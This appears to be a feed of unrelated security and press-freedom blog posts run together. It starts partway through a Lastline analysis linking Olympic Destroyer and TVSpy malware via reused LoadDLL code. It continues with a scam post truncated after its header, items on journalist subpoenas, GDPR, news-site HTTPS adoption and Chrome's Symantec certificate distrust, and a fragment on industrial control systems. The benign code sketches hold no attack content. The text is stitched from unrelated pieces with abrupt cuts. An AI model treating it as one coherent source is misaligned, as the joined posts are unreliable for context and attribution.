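As a rough illustration of the code-hashing idea (the actual normalization and hashing pipeline is considerably more involved and is not described in this post), here is a toy Python sketch that strips immediates and addresses from disassembly lines before hashing, so that two compilations of the same logic that differ only in constants and relocations collide on the same hash:

```python
import hashlib
import re

def normalize(block):
    """Normalize a basic block of disassembly text: collapse whitespace and
    replace hex immediates/addresses with a placeholder, so that relocation
    and constant changes don't alter the hash. (Illustrative only.)"""
    out = []
    for line in block:
        line = re.sub(r'\b0x[0-9a-fA-F]+\b', 'IMM', line)  # mask immediates
        line = re.sub(r'\s+', ' ', line.strip())            # collapse spacing
        out.append(line)
    return '\n'.join(out)

def code_hash(block):
    """Hash the normalized block; matching hashes suggest reused code."""
    return hashlib.md5(normalize(block).encode()).hexdigest().upper()

# Two builds differing only in addresses/constants hash identically.
a = ["mov eax, 0x401000", "add eax, 0x10", "ret"]
b = ["mov eax, 0x402330", "add eax, 0x20", "ret"]
assert code_hash(a) == code_hash(b)
```

Hunting then reduces to indexing these hashes for millions of files and querying for any other binary that shares a rare hash, which is exactly how the link described next was found.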

A very specific code hash led us through this process: 7CE26E95118044757D3C7A97CF9D240A (Lastline customers can use it to query our Global Threat Intelligence Network). This rare code hash surprisingly linked 21ca710ed3bc536bd5394f0bff6d6140809156cf, a payload of the Olympic Destroyer campaign, with some other samples of a remote access trojan, “TVSpy.” Though the threat’s actual internal name is TVRAT, the malware is known and labelled in VirusTotal as Trojan.Pavica or Trojan.Mezzo, neither of which was previously connected to the original Olympic Destroyer campaign.

Figure 1 shows the actual code referenced by the code hash: it is a function used to read a buffer and subsequently parse a PE header from it.

Figure 1: The code referenced by the code hash 7CE26E95118044757D3C7A97CF9D240A, shared by both the Olympic Destroyer sample 21ca710ed3bc536bd5394f0bff6d6140809156cf (SHA1) and the TVSpy sample a61b8258e080857adc2d7da3bd78871f88edec2c.

This is not where the code reuse ends: the function referencing and invoking the following fragment (see Figure 2) also shares almost all of the same logic. This function is responsible for loading a PE file from the memory buffer and executing its entry point.

Figure 2: Function responsible for loading PE file from memory reused in both Olympic Destroyer and TV Spy

A Deeper Dive Based on Unusual Code

We decided to investigate this piece of code further, since loading a PE from memory is not all that common. Its origin raised several questions:

  1. Why is that piece of code the only link between the two samples?
  2. Were there any other samples sharing the same code?

Our first discovery was the remote access trojan TVSpy, mentioned above. This family has been the subject of a few previous research investigations, and a recent Benkow Lab blog post (from November 2017) even reported that the source code was available on GitHub.

Unfortunately, all links to GitHub are now dead. But that didn’t stop us from finding the actual source code (or at least evidence that it was indeed published at some point). Apparently it was sold for US$500 on an underground Russian forum in 2015. Even though the original post and links are gone, a Russian information security forum kept a copy of the source code package alongside a description of the original sale announcement (see Figure 3).

Figure 3: TVSpy code as sold in an underground forum (according to researchers from

Not Enough – The Investigation Continued

Although interesting, this connection was ultimately not enough to tie Olympic Destroyer to Russia or to TVSpy. So we kept digging. Further research finally identified the code in Figures 1 and 2 as part of an open-source project called LoadDLL (see Figure 4), first published back in March 2014.

Figure 4: Fragment of LoadDLL source code from LoadDLL project

However, a couple of things still didn’t add up: why had we only managed to identify samples from 2017 if the source code was released in 2014? What about older versions of TVSpy? How come our search didn’t return any of those samples? Were the Olympic Destroyer and TVSpy samples from 2017 sharing more than just the LoadDLL code?

Apparently TVSpy went through a few transformations. Samples from 2015 did embed and use the LoadDLL code, but the compiler performed some specific optimizations that made the code unique (see Figure 5). In particular, the compiler optimized out both “flags” (not used in the function) and “read_proc” (a statically linked function) from the parameters of LoadDll, but it couldn’t optimize out an “if (read_proc)” check, even though that check is useless since “read_proc” is no longer passed as a parameter.

Figure 5. Reconstructed source code of LoadDll from TVSpy dated back to 2015

The “read_proc” function itself is also identical to the one from the source code (see Figures 6 and 7), and as you can see in Figure 8, it also gets called exactly the same way as in the original source code.

Figure 6: read_proc function implementation

Figure 7: read_proc function implementation

The most interesting aspect for us is the version of TVSpy that dates back to 2017-2018 and shares with Olympic Destroyer almost the exact binary code of LoadDLL. You can see LoadDll_LoadHeaders for those samples in Figure 9: as you might notice, the function looks different than the one from the older version (see Figure 8).

Figure 8. Reconstructed source code of LoadDLL_LoadHeaders function from TVSpy dated back to 2015

At first we thought that the authors had added new checks before calling the read_proc function, making a clear link between Olympic Destroyer and TVSpy (how, after all, could the same code modifications appear if the authors were not the same?). However, after further review we realized that read_proc didn’t exist anymore. Instead, it had been inlined by the compiler, resulting in a statically linked memcpy function.

Figure 9. Reconstructed LoadDLL_LoadHeaders from TVSpy and OlympicDestroyer samples, including additional check due to inlining of the read_proc function.

Also the meaningless check in LoadDll (“if (read_proc)”) we mentioned before has disappeared in the new version of the code (see Figure 10).

Figure 10. Reconstructed LoadDll from TVSpy and Olympic Destroyer samples, with the meaningless “if (read_proc)” check no longer present.

The Bottom Line – Evidence is Inconclusive

In conclusion, we believe there is not enough evidence to substantiate the claim that Olympic Destroyer and the new versions of TVSpy using the same modified source code were built by the same author.

The more probable explanation, in our view, is that the sample was built with a newer compiler that further optimized the code. That would still mean that both the new version of TVSpy and Olympic Destroyer were built using the same toolchain configured in the very same way (full optimization enabled and the C++ runtime statically linked). We actually went to the extent of compiling LoadDLL with MS Visual Studio 2017 with the C++ runtime statically linked, and we managed to get the very same code as the one included in both Olympic Destroyer and TVSpy.

Although we would have liked to finally solve the dilemma and unveil the actors behind the Olympic Destroyer attack, we ended up with more questions than answers; but admittedly, that’s sometimes what research is about.

First, why would the authors of allegedly state-sponsored malware use an old LoadDLL project from an open-source project from 2014? It is hard to believe that they could not come up with their own implementation, or use much more advanced open-source projects, rather than relying on an educational prototype buried way beyond the first page of Google results.

Or maybe the actors were not as advanced as we would like to think, perhaps seeing this as a one-time job, without enough resources to avoid using publicly available source code to quickly build their malware? Or maybe it’s just another false flag, and the real authors decided to use the TVSpy source code as released in 2015 to leave a “Russian fingerprint”?

Maybe all of the above?

At the beginning of this article we stated that attribution is not just hard; it’s often a wilderness of mirrors and, more often than not, a bit anticlimactic. As it turns out, that was quite a precise prediction.

The post From Russia(?) with Code appeared first on Lastline.

"Faster payment" scam is not quite what it seems

I see a lot of "fake boss" fraud emails in my day job, but it's rare that I see them sent to my personal email address. These four emails all look like fake boss fraud emails, but there's something more going on here.

From: Ravi [Redacted]
Reply-To: Ravi [Redacted]
To:
Date: 23 February 2018 at 12:02

An increasing number of journalists have recently faced subpoenas

Wikimedia Commons

In mid-January, two police officers visited the home of documentary filmmaker Nora Donaghy in Los Angeles, showed her a search warrant, and seized her cell phone. She was also subpoenaed to testify in a grand jury trial about her communications with a source.

Three months into 2018, the most under-the-radar threat to press freedom has shown itself to be not arrests of or attacks on journalists, but rather subpoenas to produce documents or attempts to force journalists to testify about their sources.

While few of these cases have made national headlines because the Trump administration has not been involved, journalists in state and local jurisdictions have been subpoenaed to testify in court by government actors five times already this year, in addition to at least five times in 2017. (Update: Shortly after this post was published, Freedom of the Press Foundation became aware of a sixth subpoena in 2018.)

Donaghy’s colleague William Erb was issued a similar subpoena. Although several news organizations have reported that a ruling was made on these subpoenas, no decision has been made public. Additionally, three Chicago-based newspapers (the Chicago Sun-Times, Chicago Tribune, and Daily Herald) were subpoenaed in January 2018 to produce copies of all stories they had run about the fatal police shooting of teenager Laquan McDonald.

In December 2017, investigative journalist Jamie Kalven was subpoenaed by defense attorneys for a Chicago police officer to testify and reveal details about his sources in the criminal trial of the officer in Cook County, Illinois. A month prior, across the country in San Diego, freelance reporter Kelly Davis was ordered to testify at a deposition by the County of San Diego and turn over unpublished materials used in her reporting. These subpoenas, both of which were later quashed, are just two examples of subpoenas against journalists last year.

(Note: The U.S. Press Freedom Tracker does not count legal orders by private parties, but rather only those issued by government prosecutors or agencies ordering journalists to testify in court. We also count legal orders brought by private parties when government officials subpoena journalists in a private capacity.)

When we launched the U.S. Press Freedom Tracker, we weren’t counting legal actions like subpoenas and prior restraint the way we were counting arrests. While the Tracker has highlighted each individual instance of assaults and arrests since its inception, we predicted that subpoenas would be less common. The Tracker has only been documenting press freedom violations that have occurred since January 2017, so it’s difficult to draw conclusions about the prevalence of subpoenas. But the sudden uptick in subpoenas served on journalists in just the past six months is deeply worrying.

To reflect the frequency and press freedom significance of these subpoenas, we modified the counter on the Tracker’s homepage. Although previously it displayed the number of border stops of journalists, it now shows the number of subpoenas.

Legal action that mandates journalists to turn over their reporting materials or reveal information about their sources is always concerning. Investigative journalism, and journalism that challenges power, requires the ability of journalists to keep their sources and reporting processes confidential—especially in the face of legal process.

“A democracy requires a free flow of information to the public.  But if a journalist may be forced to disclose the identity of a confidential source, then potential whistleblowers who are concerned about maintaining their anonymity will be less likely to come forward with important information about government or corporate misconduct. So ultimately the public loses out on this valuable information, and the health of our democracy suffers,” says Sarah Matthews, Staff Attorney at Reporters Committee for Freedom of the Press.

It’s a decades-old problem. Journalists have, since the 1970s, gone to jail rather than give up their sources in court. In response, thankfully, many states have “press shield” or “reporter’s privilege” laws. Such laws, which exist in approximately 40 states, aim to provide at least some protection for journalists to avoid testifying about their sources or information that they obtained as part of their newsgathering processes.

Unfortunately, not every state has such laws, and many reporter’s privilege statutes were written decades ago and are no longer adequate in the digital age. While the prospect of passing a strong federal shield law faces increasingly long odds (and could potentially have unintended consequences for press freedom), state legislatures can provide important protections to journalists by updating or passing new press shield laws that take into account the shifting nature of online journalism.

Subpoenaing journalists for their confidential information is a long-standing problem, and at least at the state and local level, it is not one that will be going away anytime soon. We’ll continue to systematically document every such incident with the U.S. Press Freedom Tracker as long as the practice persists.

How prepared is your business for the GDPR?

The GDPR is the biggest privacy shake-up since the dawn of the internet, and it comes into force in just weeks, on 25th May. The GDPR carries potentially head-spinning financial penalties for businesses found not to be complying, so it really is essential for any business which touches EU citizens' personal data to thoroughly do its privacy-rights homework and properly prepare.

Sage has produced a nice GDPR infographic which breaks down the basics of the GDPR with tips on complying; it is shared below.

I am currently writing a comprehensive GDPR Application Developer's Guidance series for IBM developerWorks, which will be released in the coming weeks.

The GDPR: A guide for international business - A Sage Infographic

How secure are news sites? A report from the first year of Secure The News

Header from the Secure The News project

For over a year now, Secure The News has automatically monitored the HTTPS encryption practices at more than 100 major news sites around the world. Secure The News is a Freedom of the Press Foundation project built to regularly update a scorecard of some 131 news sites. We encourage sites to climb up those rankings because well-configured HTTPS encryption can protect reader privacy, enhance site security, and make important reporting harder to censor or manipulate.

We're pleased to report that since we began monitoring in late 2016, HTTPS encryption has seen a pronounced increase in the quality and reach of its deployment among news sites, and we continue to improve the tools we use to monitor that rise.

Let's start with the stats. We can see the overall rise in HTTPS deployment and quality by monitoring the "grades" we give sites based on their use of HTTPS. Each dot on this graph represents the grade from a sampled scan, while the line shows the average grade over time. That grade, out of 100, has risen from about 31 points at the end of 2016 to over 53 points now. A major improvement, to be sure, but with plenty of room to get better.

Chart showing average and a sample of grades from Secure The News scans

In several key categories, we've compared our very first evaluation of the 131 news sites we monitor with the most recent.

  • HTTPS encryption is available on two-thirds of sites we're monitoring—89 of 131. That's up from just over one-third, or 48 sites, when we first ran tests starting in late November 2016.

  • Nearly 60% now offer HTTPS encryption by default. That's up from just 22% on our first scans—a massive leap in under 18 months.

  • Another exciting development for the nerds: the use of HSTS (HTTP Strict Transport Security), which aims to keep browsers from ever using an insecure connection, is way up: from just 9% of sites in our first scans to over 25% now.
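HSTS works by having a site send a Strict-Transport-Security response header over HTTPS, which tells the browser to refuse insecure connections to that host for a stated period. As a minimal sketch of what a scanner like ours has to do with that header, here is a hypothetical parser (not the actual Secure The News code) that splits the header value into its directives:

```python
def parse_hsts(header_value):
    """Parse a Strict-Transport-Security header value into a dict of directives.

    Example input: "max-age=31536000; includeSubDomains; preload"
    Valueless directives (includeSubDomains, preload) map to True.
    """
    directives = {}
    for part in header_value.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" in part:
            name, _, value = part.partition("=")
            directives[name.strip().lower()] = value.strip().strip('"')
        else:
            directives[part.lower()] = True
    return directives

policy = parse_hsts("max-age=31536000; includeSubDomains; preload")
print(policy)
```

A scanner would then check, for instance, that max-age is large (a year or more) and that includeSubDomains is present before awarding full HSTS points.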

In our first year of running Secure The News, we've made a few key improvements to the site as well.

In early 2017 we created a Twitter bot that would post changes to the scorecard each weekday. Now whenever a site turns on HTTPS—or improves their HTTPS security, which readers might not otherwise spot—we post a tweet detailing the change.

We also released the code powering Secure The News as a free software project in February 2017. It is licensed under the GNU AGPL software license, which means improvements made by other people using the software can be folded back into our code.

Finally, we added an API for accessing current and historical scan data. That API was used to collect the statistics in this post and currently powers the Twitter bot. We’ll provide more information about the API, and about other new developments to Secure the News, in the near future.

Strong, well-configured HTTPS encryption is a must-have for news sites operating on the modern Web, and it’s heartening that the first year of Secure The News has recorded so many improvements on that front. Press freedom must include the ability to read free from surveillance, censorship, or manipulation, and we’ll continue to push news sites to take the important technical steps necessary to achieve that goal.

Distrust of the Symantec PKI: Immediate action needed by site operators

Update, October 17, 2018: Chrome 70 has now been released to the Stable Channel, and users will start to see full-screen interstitials on sites which still use certificates issued by the Legacy Symantec PKI. Initially this change will reach a small percentage of users, and then slowly scale up to 100% over the next several weeks.

Site Operators receiving problem reports from users are strongly encouraged to take corrective action by replacing their website certificates as soon as possible. Instructions on how to determine whether your site is affected as well as what corrective action is needed can be found below.

We previously announced plans to deprecate Chrome’s trust in the Symantec certificate authority (including Symantec-owned brands like Thawte, VeriSign, Equifax, GeoTrust, and RapidSSL). This post outlines how site operators can determine if they’re affected by this deprecation, and if so, what needs to be done and by when. Failure to replace these certificates will result in site breakage in upcoming versions of major browsers, including Chrome.

Chrome 66

If your site is using an SSL/TLS certificate from Symantec that was issued before June 1, 2016, it will stop functioning in Chrome 66, which could already be impacting your users.
If you are uncertain about whether your site is using such a certificate, you can preview these changes in Chrome Canary to see if your site is affected. If connecting to your site displays a certificate error or a warning in DevTools as shown below, you’ll need to replace your certificate. You can get a new certificate from any trusted CA, including Digicert, which recently acquired Symantec’s CA business.
An example of a certificate error that Chrome 66 users might see if you are using a Legacy Symantec SSL/TLS certificate that was issued before June 1, 2016. 

The DevTools message you will see if you need to replace your certificate before Chrome 66.
Chrome 66 has already been released to the Canary and Dev channels, meaning affected sites are already impacting users of these Chrome channels. If affected sites do not replace their certificates by March 15, 2018, Chrome Beta users will begin experiencing the failures as well. You are strongly encouraged to replace your certificate as soon as possible if your site is currently showing an error in Chrome Canary.
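If you want a quick programmatic first pass before confirming in Chrome Canary or DevTools, you can fetch a site's certificate and look at its issuer. The sketch below uses only Python's standard library; note that matching issuer organization names against Symantec brand names is an illustrative heuristic only (Chrome's distrust is keyed to the actual Legacy Symantec roots, not to name strings), so treat DevTools as the authoritative check.

```python
import socket
import ssl

# Brand names from the Symantec CA family mentioned in this post.
SYMANTEC_BRANDS = {"Symantec", "Thawte", "VeriSign", "GeoTrust", "RapidSSL", "Equifax"}

def issuer_matches_symantec(cert):
    """Heuristically check whether a certificate's issuer names a Symantec brand.

    `cert` is the dict format returned by ssl.SSLSocket.getpeercert():
    its "issuer" entry is a tuple of RDNs, each a tuple of (name, value) pairs.
    """
    for rdn in cert.get("issuer", ()):
        for name, value in rdn:
            if name == "organizationName":
                if any(brand.lower() in value.lower() for brand in SYMANTEC_BRANDS):
                    return True
    return False

def fetch_cert(host, port=443):
    """Fetch and return the peer certificate for a host (requires network access)."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()
```

Even if this heuristic flags nothing, still verify in DevTools, since replacement certificates from DigiCert can carry Symantec-era brand names while chaining to trusted roots.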

Chrome 70

Starting in Chrome 70, all remaining Symantec SSL/TLS certificates will stop working, resulting in a certificate error like the one shown above. To check if your certificate will be affected, visit your site in Chrome today and open up DevTools. You’ll see a message in the console telling you if you need to replace your certificate.

The DevTools message you will see if you need to replace your certificate before Chrome 70.
If you see this message in DevTools, you’ll want to replace your certificate as soon as possible. If the certificates are not replaced, users will begin seeing certificate errors on your site as early as July 20, 2018. The first Chrome 70 Beta release will be around September 13, 2018.

Expected Chrome Release Timeline

The table below shows the First Canary, First Beta and Stable Release for Chrome 66 and 70. The first impact from a given release will coincide with the First Canary, reaching a steadily widening audience as the release hits Beta and then ultimately Stable. Site operators are strongly encouraged to make the necessary changes to their sites before the First Canary release for Chrome 66 and 70, and no later than the corresponding Beta release dates.
            First Canary        First Beta             Stable Release
Chrome 66   January 20, 2018    ~ March 15, 2018       ~ April 17, 2018
Chrome 70   ~ July 20, 2018     ~ September 13, 2018   ~ October 16, 2018

For information about the release timeline for a particular version of Chrome, you can also refer to the Chromium Development Calendar which will be updated should release schedules change.

In order to address the needs of certain enterprise users, Chrome will also implement an Enterprise Policy that allows disabling the Legacy Symantec PKI distrust starting with Chrome 66. As of January 1, 2019, this policy will no longer be available and the Legacy Symantec PKI will be distrusted for all users. See this Enterprise Help Center article for more information.

Special Mention: Chrome 65

As noted in the previous announcement, SSL/TLS certificates from the Legacy Symantec PKI issued after December 1, 2017 are no longer trusted. This should not affect most site operators, as it requires entering into a special agreement with DigiCert to obtain such certificates. Accessing a site serving such a certificate will fail and the request will be blocked as of Chrome 65. To avoid such errors, ensure that such certificates are only served to legacy devices and not to browsers such as Chrome.

Insecure by design: What you need to know about defending critical infrastructure

Patching security vulnerabilities in industrial control systems (ICS) is useless in most cases and actively harmful in others, ICS security expert and former NSA analyst Robert M. Lee of Dragos told the US Senate in written testimony last Thursday. The "patch, patch, patch" mantra has become a blind tenet of faith in the IT security realm, but has little application to industrial control systems, where legacy equipment is often insecure by design.
